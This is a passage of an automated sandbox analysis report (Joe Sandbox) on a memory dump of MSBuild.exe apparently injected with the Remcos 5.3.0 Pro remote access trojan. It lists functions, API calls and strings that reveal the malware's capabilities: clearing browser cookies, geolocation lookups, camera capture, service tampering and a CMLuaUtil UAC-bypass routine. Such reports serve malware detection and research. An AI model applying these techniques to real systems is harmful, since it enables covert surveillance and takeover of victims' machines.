                                                • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID: HE$HE
                                                • API String ID: 269201875-1978648262
                                                • Opcode ID: 7800a519142f47635a8271b71284b9659b79823d2b8030c83ffac0f9e2146641
                                                • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                • Opcode Fuzzy Hash: 7800a519142f47635a8271b71284b9659b79823d2b8030c83ffac0f9e2146641
                                                • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumInfoOpenQuerysend
                                                • String ID: TUFTUF$>G$DG$DG
                                                • API String ID: 3114080316-344394840
                                                • Opcode ID: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                • Opcode Fuzzy Hash: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                  • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                  • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                • API String ID: 1133728706-4073444585
                                                • Opcode ID: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                • Opcode Fuzzy Hash: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                • int.LIBCPMT ref: 0040FC0F
                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: P[G
                                                • API String ID: 2536120697-571123470
                                                • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                Strings
                                                • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                • String ID: http://geoplugin.net/json.gp
                                                • API String ID: 3121278467-91888290
                                                • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                • _free.LIBCMT ref: 0044FD29
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 0044FD34
                                                • _free.LIBCMT ref: 0044FD3F
                                                • _free.LIBCMT ref: 0044FD93
                                                • _free.LIBCMT ref: 0044FD9E
                                                • _free.LIBCMT ref: 0044FDA9
                                                • _free.LIBCMT ref: 0044FDB4
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                  • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                  • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                  • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                • API String ID: 1866151309-2070987746
                                                • Opcode ID: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                • Opcode Fuzzy Hash: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
                                                  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                • CoUninitialize.OLE32 ref: 0040688E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitializeObjectUninitialize_wcslen
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                • API String ID: 3851391207-1840432179
                                                • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                • int.LIBCPMT ref: 0040FEF2
                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: H]G
                                                • API String ID: 2536120697-1717957184
                                                • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                • GetLastError.KERNEL32 ref: 0040B2EE
                                                Strings
                                                • [Chrome Cookies not found], xrefs: 0040B308
                                                • UserProfile, xrefs: 0040B2B4
                                                • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteErrorFileLast
                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                • API String ID: 2018770650-304995407
                                                • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                • Opcode Fuzzy Hash: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                Function 0041BEB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Console$AllocOutputShowWindow
                                                • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                • API String ID: 2425139147-2527699604
                                                • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$BG
                                                • API String ID: 0-3446331285
                                                • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                Function 00419F32 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                • Sleep.KERNEL32(00002710), ref: 00419F79
                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                • String ID: Alarm triggered$`#v
                                                • API String ID: 614609389-3049340936
                                                • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                • __allrem.LIBCMT ref: 00439789
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                • __allrem.LIBCMT ref: 004397BC
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                • __allrem.LIBCMT ref: 004397F1
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 1992179935-0
                                                • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __cftoe
                                                • String ID:
                                                • API String ID: 4189289331-0
                                                • Opcode ID: 6857f65105857f94604de097a755c155121e7cc81d429690707872ca309dbf5f
                                                • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                • Opcode Fuzzy Hash: 6857f65105857f94604de097a755c155121e7cc81d429690707872ca309dbf5f
                                                • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16
                                                • String ID: a/p$am/pm
                                                • API String ID: 3509577899-3206640213
                                                • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: H_prologSleep
                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                • API String ID: 3469354165-462540288
                                                • Opcode ID: fd84d583727d63a22948aa60d8945a9d52214e7481cacf893f5ebe8d1c8ecc38
                                                • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                • Opcode Fuzzy Hash: fd84d583727d63a22948aa60d8945a9d52214e7481cacf893f5ebe8d1c8ecc38
                                                • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                • String ID:
                                                • API String ID: 493672254-0
                                                • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
